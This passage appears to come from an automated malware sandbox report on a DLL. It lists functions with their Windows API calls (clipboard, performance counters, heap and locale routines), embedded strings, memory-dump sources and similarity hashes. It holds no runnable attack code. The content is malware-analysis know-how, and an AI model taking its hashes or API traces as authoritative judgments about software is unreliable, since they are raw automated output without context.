Part of subcall function 6E9C94A7: RaiseException.KERNEL32(?,?,6E9C6476,000000FF,00000000,00000000,24448D6E,?,?,?,?,6E9C6476,000000FF,6E9FCD2C,?,000000FF), ref: 6E9C9507

__CxxThrowException@8.LIBVCRUNTIME ref: 6E9B2262
___std_exception_copy.LIBVCRUNTIME ref: 6E9B228F

Strings

ios_base::failbit set, xrefs: 6E9B2135
ios_base::badbit set, xrefs: 6E9B2227, 6E9B2252, 6E9B2273

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8Throw$ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::failbit set
API String ID: 3941765731-1240500531
Opcode ID: e5d33f793ae91bceb4120985210560da8a99482854c1b76429f33cec188345f2
Instruction ID: dde732118f963fb4c5da0b9e64b1dc4d10a3fe67177e52302cbbcee8810c6aad
Opcode Fuzzy Hash: e5d33f793ae91bceb4120985210560da8a99482854c1b76429f33cec188345f2
Instruction Fuzzy Hash: 7F41D3B1900209AFC704DFD8D840BDEBBFCEF49624F148A1AE514D7640E731EA448FA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E9B5D90, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91threadclipboardCOMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E9B5E04
SwitchToThread.KERNEL32(00000000,?,?,?,?,?,?), ref: 6E9B5E74
GetOpenClipboardWindow.USER32(00000000,?,?,?), ref: 6E9B5E93
GetACP.KERNEL32(00000000,?,?,?), ref: 6E9B5EA4

Strings

e, xrefs: 6E9B5DAF

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: ClipboardOpenSwitchThreadUnothrow_t@std@@@Window__ehfuncinfo$??2@
String ID: e
API String ID: 1567280528-4024072794
Opcode ID: 81efc703dff406c44d2efdaeb6d93f89804a671c42d35dce858acc4b9f778921
Instruction ID: e74dc6c8dead2962f67c0ab0246f3c8a58d35c8ec58ece4b522d06a24ed193bf
Opcode Fuzzy Hash: 81efc703dff406c44d2efdaeb6d93f89804a671c42d35dce858acc4b9f778921
Instruction Fuzzy Hash: CE31C1329187054FC312DE7A944461BF7EAAFEA384F148B2AF441F2155FB30D8888A92

Uniqueness

Uniqueness Score: -1.00%

Function 6E9C1C00, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 39windowCOMMON

Download Yara Rule

APIs

InsertMenuW.USER32(?,?,00000C00,?,00000000), ref: 6E9C1C2A
InsertMenuW.USER32(?,?,00000400,?,Performance Monitor - (Reload Configuration)), ref: 6E9C1C3E
InsertMenuW.USER32(?,?,00000400,?,Performance Monitor - (Edit Configuration)), ref: 6E9C1C52

Strings

Performance Monitor - (Edit Configuration), xrefs: 6E9C1C40
Performance Monitor - (Reload Configuration), xrefs: 6E9C1C2C

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: InsertMenu
String ID: Performance Monitor - (Edit Configuration)$Performance Monitor - (Reload Configuration)
API String ID: 1478380399-4081388356
Opcode ID: 5d66331111edbc8ff8dae490c12e4531b8854ee6f5d9e2b0c8659ab243e54d00
Instruction ID: f886c5012efd4cd1c45c74455496eaabc31d08ff9d54768a5194aa135ed91423
Opcode Fuzzy Hash: 5d66331111edbc8ff8dae490c12e4531b8854ee6f5d9e2b0c8659ab243e54d00
Instruction Fuzzy Hash: 27F09A3225021DBBEB11DE859C80FAB7B6DEF89610F044016BB14AA181C271E922AFB4

Uniqueness

Uniqueness Score: -1.00%

Function 6E9D6A30, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,6E9D69E1,6E9D69A9), ref: 6E9D6A50
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6E9D6A63
FreeLibrary.KERNEL32(00000000,?,?,?,6E9D69E1,6E9D69A9), ref: 6E9D6A86

Strings

CorExitProcess, xrefs: 6E9D6A5B
mscoree.dll, xrefs: 6E9D6A49

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: cc87ea35da49a30787fe9fa4b9a2d0241005e7eb318a653fc64f8142c2d5f4c4
Instruction ID: cb232ca0a54094c2dd66b011daf2d8c2f7ec0b6cb983e3fd647414aed2b821bf
Opcode Fuzzy Hash: cc87ea35da49a30787fe9fa4b9a2d0241005e7eb318a653fc64f8142c2d5f4c4
Instruction Fuzzy Hash: 7AF0A430504718BBCF11AFA0C818BEEBFB8EF45215F018069E905A6251DB309945CE90

Uniqueness

Uniqueness Score: -1.00%

Function 6E9DED2F, Relevance: 7.7, APIs: 5, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d0f632be4cd696d75596e2bbcbf0036f1d9a8f83b8f5af212cd37e8fd78cc2d
Instruction ID: 322d917a97af692dc64c74bf893426cc73aa10fdf6e91acd8ca4c7c5ad048da8
Opcode Fuzzy Hash: 5d0f632be4cd696d75596e2bbcbf0036f1d9a8f83b8f5af212cd37e8fd78cc2d
Instruction Fuzzy Hash: A771B131D24A2B9FDB118FD9C884AAEFB7DEF51350F148629E42457284DB70D889CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E9DB9B3, Relevance: 7.7, APIs: 5, Instructions: 187COMMON

Download Yara Rule

APIs

Part of subcall function 6E9D9BD2: RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,6E9C8F9C,00000105,000000FF,24448D6E,00000000,?,6E9B1687,?,00000103,000000FF), ref: 6E9D9C04

_free.LIBCMT ref: 6E9DBABE
_free.LIBCMT ref: 6E9DBAD5
_free.LIBCMT ref: 6E9DBAF4
_free.LIBCMT ref: 6E9DBB0F
_free.LIBCMT ref: 6E9DBB26

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 221c91657a9e5e588435b74419d549411778584be15f97f354e8ae445b5301af
Instruction ID: d02e1a5aa4f21bee5781f1c4b63d7605401e46c75c3a56daba07daec99b539b4
Opcode Fuzzy Hash: 221c91657a9e5e588435b74419d549411778584be15f97f354e8ae445b5301af
Instruction Fuzzy Hash: 9551B131A00B15AFDB10DFA9C840AAA77FCEF59724F408569E809DB258F735D909CF80

Uniqueness

Uniqueness Score: -1.00%

Function 6E9C4260, Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

PdhRemoveCounter.PDH(?,B5334A76,?,?,00000000,6E9E9E9B,000000FF,?,6E9C15EF,00000000), ref: 6E9C42B3
PdhCloseQuery.PDH(?,B5334A76,?,?,00000000,6E9E9E9B,000000FF,?,6E9C15EF,00000000), ref: 6E9C42DE
PdhOpenQueryW.PDH(00000000,00000000,?), ref: 6E9C4302
PdhValidatePathW.PDH(?), ref: 6E9C435E
PdhAddCounterW.PDH(?,?,00000000,?), ref: 6E9C438A

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: CounterQuery$CloseOpenPathRemoveValidate
String ID:
API String ID: 698537007-0
Opcode ID: b8c4b16615f7582c7b81bbbaaa0ce2c07f9c6a2717f0200ba869caa997030292
Instruction ID: a4562017ec3c2bfcc1317ef07474fb97e0622380014655024536b40870a59607
Opcode Fuzzy Hash: b8c4b16615f7582c7b81bbbaaa0ce2c07f9c6a2717f0200ba869caa997030292
Instruction Fuzzy Hash: 1851C171A00259ABDB20DF54C840BDAB7B9FF44714F108599E958AB340DB74EAC6CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 6E9D70FB, Relevance: 7.6, APIs: 5, Instructions: 129COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E9D716D
_free.LIBCMT ref: 6E9D718D

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: b40ce0a0e5e989bb8e19972c2c7336edd5b897fa726c1caa323fc06a3e6ca992
Instruction ID: b1551ea71291a8c5cbdb8386075bd6e12190a8cc975785caeff7b21d958f193e
Opcode Fuzzy Hash: b40ce0a0e5e989bb8e19972c2c7336edd5b897fa726c1caa323fc06a3e6ca992
Instruction Fuzzy Hash: B341F572A00A109FDB14DFB8C880A9DB7F9EF85718F158AA9D515EB381DB30E905CF81

Uniqueness

Uniqueness Score: -1.00%

Function 6E9B4C40, Relevance: 7.6, APIs: 5, Instructions: 124COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6E9B4C7C
std::_Lockit::_Lockit.LIBCPMT ref: 6E9B4C9E
std::_Lockit::~_Lockit.LIBCPMT ref: 6E9B4CBE
std::_Facet_Register.LIBCPMT ref: 6E9B4D8F
std::_Lockit::~_Lockit.LIBCPMT ref: 6E9B4DAF

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: efaedc00b6ef6a47b04870feb39cee492e7fdf0c5ac2fd8350b3c5b1027d653b
Instruction ID: 94e15bcc46e833c38b924a7b5982e31f4ae7441654bc78c6f32c646b91b00a15
Opcode Fuzzy Hash: efaedc00b6ef6a47b04870feb39cee492e7fdf0c5ac2fd8350b3c5b1027d653b
Instruction Fuzzy Hash: 21517B71A147158BCB11DF94C440BEEB7B8EF95B18F10455DD806AB280EB74FA46CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6E9B4AE0, Relevance: 7.6, APIs: 5, Instructions: 113COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6E9B4B16
std::_Lockit::_Lockit.LIBCPMT ref: 6E9B4B36
std::_Lockit::~_Lockit.LIBCPMT ref: 6E9B4B56
std::_Facet_Register.LIBCPMT ref: 6E9B4BF3
std::_Lockit::~_Lockit.LIBCPMT ref: 6E9B4C13

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: 1369c44e41b121105b27fcb054490226deab7d747704bc3f1d2a8f2c3bd050f9
Instruction ID: a8ec5da0f61aefda6367f2d5e7da6827b0d9bb813772eda43f114c83186734dd
Opcode Fuzzy Hash: 1369c44e41b121105b27fcb054490226deab7d747704bc3f1d2a8f2c3bd050f9
Instruction Fuzzy Hash: D3418B71A042158FCB11DFD5C480BEEB7B8EF95B18F10495DD906AB281EB30EA46CF92

Uniqueness

Uniqueness Score: -1.00%

Function 6E9DDD03, Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 6E9DDD0C
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6E9DDD2F

Part of subcall function 6E9D9BD2: RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,6E9C8F9C,00000105,000000FF,24448D6E,00000000,?,6E9B1687,?,00000103,000000FF), ref: 6E9D9C04

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 6E9DDD55
_free.LIBCMT ref: 6E9DDD68
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6E9DDD77

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 7ab1135bcec365394d147a66c631f7744853dfc457a9595b2765cc7c73f8e868
Instruction ID: b16193dd53063859aafbd8e6954b8584dc5c2b65125ddb2a52cd8f1ce4164380
Opcode Fuzzy Hash: 7ab1135bcec365394d147a66c631f7744853dfc457a9595b2765cc7c73f8e868
Instruction Fuzzy Hash: FF0175B6605F2A7F2B2119FA4C8CE7B297DEEC3AA53114269F914C3644EB65CC058DB0

Uniqueness

Uniqueness Score: -1.00%

Function 6E9DA3E2, Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(000000FF,6E9D6995,?,6E9D642D,6E9D9BBE,6E9D6995,?,6E9D731A,000000FF,000000FF), ref: 6E9DA3E7
SetLastError.KERNEL32(00000000,00000008,000000FF,?,6E9D731A,000000FF,000000FF), ref: 6E9DA40D
_free.LIBCMT ref: 6E9DA44D
_free.LIBCMT ref: 6E9DA480
SetLastError.KERNEL32(00000000,000000FF), ref: 6E9DA48D

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: f714da0d2a89be597cf7eb07ac4012faef108459287e3e92e38b9f262c106be4
Instruction ID: 8194e20379b6e6d02ee9ec4260220bf332c7e7d04f5362e95b779593aeae6b96
Opcode Fuzzy Hash: f714da0d2a89be597cf7eb07ac4012faef108459287e3e92e38b9f262c106be4
Instruction Fuzzy Hash: 8F114072208E216BD6021AF99D48E7B272DAFE227D724CA10F538923C4FF70C91D8D10

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E4978, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E9E4990

Part of subcall function 6E9D9B98: HeapFree.KERNEL32(00000000,00000000,?,6E9D731A,000000FF,000000FF), ref: 6E9D9BAE
Part of subcall function 6E9D9B98: GetLastError.KERNEL32(6E9D6995,?,6E9D731A,000000FF,000000FF), ref: 6E9D9BC0

_free.LIBCMT ref: 6E9E49A2
_free.LIBCMT ref: 6E9E49B4
_free.LIBCMT ref: 6E9E49C6
_free.LIBCMT ref: 6E9E49D8

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 86a26099ee2880bcddd9e6e265faec205d1e5d65a7d64c3a84ad114337c90e0f
Instruction ID: 64b9fdb6989519cd042c4a31905fc4b1e22de9de5cc72678b8d9ae220772decd
Opcode Fuzzy Hash: 86a26099ee2880bcddd9e6e265faec205d1e5d65a7d64c3a84ad114337c90e0f
Instruction Fuzzy Hash: 99F09671444F19AB8A61EEE8E490C9733DDAF40B143A58C05F11AE7900C734F881CEA4

Uniqueness

Uniqueness Score: -1.00%

Function 6E9C8750, Relevance: 7.5, APIs: 5, Instructions: 26COMMON

Download Yara Rule

APIs

_com_issue_error.COMSUPP ref: 6E9C875C
GetLastError.KERNEL32(?,00000000,?,00000000,8007000E), ref: 6E9C8761
_com_issue_error.COMSUPP ref: 6E9C8774
GetLastError.KERNEL32(?,00000000,8007000E), ref: 6E9C8782
_com_issue_error.COMSUPP ref: 6E9C8795

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: _com_issue_error$ErrorLast
String ID:
API String ID: 1321852664-0
Opcode ID: 07aa8422eaeab54b32c8cfc81d9c9adcff52701df726883fc5b8e44dedcfd69d
Instruction ID: a74955896a2fad9e1e825dba3fa901b0937f39966c0ed2854a8a317b89746fbd
Opcode Fuzzy Hash: 07aa8422eaeab54b32c8cfc81d9c9adcff52701df726883fc5b8e44dedcfd69d
Instruction Fuzzy Hash: 5BE0CDF450025A99C6347BF01D087AA30AC2F50925F204E187198F5094FB3CF1114D7B

Uniqueness

Uniqueness Score: -1.00%

Function 6E9D6AD4, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Windows\SYSTEM32\loaddll32.exe, xrefs: 6E9D6B17, 6E9D6B1E, 6E9D6B52

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: C:\Windows\SYSTEM32\loaddll32.exe
API String ID: 0-1872383224
Opcode ID: d522514c2abe7408ddbcd3fcc5c5bab5f68c6344e7998813f0e92549f4d47bca
Instruction ID: bf0a000423e052e048cfaa9524183ee58535b17aeb7ad6ea56fcee2191417d2d
Opcode Fuzzy Hash: d522514c2abe7408ddbcd3fcc5c5bab5f68c6344e7998813f0e92549f4d47bca
Instruction Fuzzy Hash: F041C371E24A29AFDB11DFD9C9809EEBBBCEF99314B00846AE400E7201D775DA49CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6E9B17B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6E9B17DD
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6E9B182C

Part of subcall function 6E9C60DA: _Yarn.LIBCPMT ref: 6E9C60F9
Part of subcall function 6E9C60DA: _Yarn.LIBCPMT ref: 6E9C611D

__CxxThrowException@8.LIBVCRUNTIME ref: 6E9B185E

Strings

bad locale name, xrefs: 6E9B1848

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
String ID: bad locale name
API String ID: 3628047217-1405518554
Opcode ID: 3b9ab0cca94cdea79e0f152c5e618307a5343fe67609ac8aad222697f7425d85
Instruction ID: 3f77ea9d9291d63754c63364459e5d3912c314b991aae53ac3898e101481a0d8
Opcode Fuzzy Hash: 3b9ab0cca94cdea79e0f152c5e618307a5343fe67609ac8aad222697f7425d85
Instruction Fuzzy Hash: 3C11BE71814B44DED720CFA9C800B8BBBF8EF29614F008A5EE459D7B81D775E108CB95

Uniqueness

Uniqueness Score: -1.00%

Function 6E9DA5BB, Relevance: 6.3, APIs: 4, Instructions: 316COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 6E9DA642

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: cae96cd944f24bfe251b0d126a4b103d3cc5a52edf7e0cf0203c8768d0cc22b6
Instruction ID: 6c7155556362a2b437ea226707d70ec6b566e8049db727c4117121b7819a6def
Opcode Fuzzy Hash: cae96cd944f24bfe251b0d126a4b103d3cc5a52edf7e0cf0203c8768d0cc22b6
Instruction Fuzzy Hash: 2CB16972D45A669FE7128F98C8507EDBBB8EF11364F148165D8109B381D3B8C966CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E9B5A30, Relevance: 6.1, APIs: 4, Instructions: 134clipboardwindowCOMMON

Download Yara Rule

APIs

GetOpenClipboardWindow.USER32(00000000,?,00000000,6E9B6431,0000002E,00000000,00000000,?,0000002E,00000000), ref: 6E9B5A3C
CloseClipboard.USER32 ref: 6E9B5A73
GetMenuCheckMarkDimensions.USER32 ref: 6E9B5B30
IsSystemResumeAutomatic.KERNEL32 ref: 6E9B5BA0

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: Clipboard$AutomaticCheckCloseDimensionsMarkMenuOpenResumeSystemWindow
String ID:
API String ID: 2155751611-0
Opcode ID: 420c58f88c7220a427d497e810b55acf67b977be7ae7237d411bba84f75a96ba
Instruction ID: 462a25a1ce2d39e871e62e489d0fe93894f9a8d1b24f911d12af309ba9c21eb7
Opcode Fuzzy Hash: 420c58f88c7220a427d497e810b55acf67b977be7ae7237d411bba84f75a96ba
Instruction Fuzzy Hash: 7C41B431914B564AC303DEB5C49021FF7ABBFEA684F549B2AE441B6255FB30C8858E82

Uniqueness

Uniqueness Score: -1.00%

Function 6E9B8FB0, Relevance: 6.1, APIs: 4, Instructions: 121COMMON

Download Yara Rule

APIs

SysStringLen.OLEAUT32(?), ref: 6E9B8FE1

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: String
String ID:
API String ID: 2568140703-0
Opcode ID: 36383e267eb119cb748b8d0e7189aced13e0f8b401a3f0d46581f71870c3ac02
Instruction ID: ded782a242825d6c319d001703e78880ac7be7c0ed9198073ce7a45e4cb27e34
Opcode Fuzzy Hash: 36383e267eb119cb748b8d0e7189aced13e0f8b401a3f0d46581f71870c3ac02
Instruction Fuzzy Hash: 85312832B083164B9F18CDADD49556BBBE9EF44370710827EEC15C7248EB32D850CAC0

Uniqueness

Uniqueness Score: -1.00%

Function 6E9DF32A, Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(24448D6E,00000000,?,00000002,00000000,00000000,00000000,00000000,?,24448D6E,00000001,00000002,?,00000001,00000000,?), ref: 6E9DF377
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 6E9DF400
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6E9DF412
__freea.LIBCMT ref: 6E9DF41B

Part of subcall function 6E9D9BD2: RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,6E9C8F9C,00000105,000000FF,24448D6E,00000000,?,6E9B1687,?,00000103,000000FF), ref: 6E9D9C04

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 5875e5b37efd1fee948499c48d84b7fbceaa540ec925a5ba02ff4f368611eb74
Instruction ID: 072fc784265d1ee308a92df2fe9f4a719f68b95eee1d3336894b08f5a5f876e1
Opcode Fuzzy Hash: 5875e5b37efd1fee948499c48d84b7fbceaa540ec925a5ba02ff4f368611eb74
Instruction Fuzzy Hash: 6A310372A00A2AAFDF258FA4CC55DEE7BA9EF40718F158128EC14DB240E735C959CF90

Uniqueness

